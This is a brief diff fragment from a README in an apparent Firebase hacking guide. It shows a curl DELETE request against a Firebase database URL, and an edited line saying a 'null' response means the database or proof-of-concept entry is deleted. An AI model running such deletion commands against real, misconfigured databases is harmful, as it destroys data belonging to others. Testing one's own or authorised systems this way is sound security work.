Subhashis360/FirebaseHacking/README.md

 curl -X DELETE https://<subdomain>.firebaseio.com/-OKELb6ZxxxxDEiDm7W.json
 ```

-If the request is successful and response is "null" , the Firebase database is deleted.
+If the request is successful and response is "null" , the Firebase database Poc is deleted.

 ---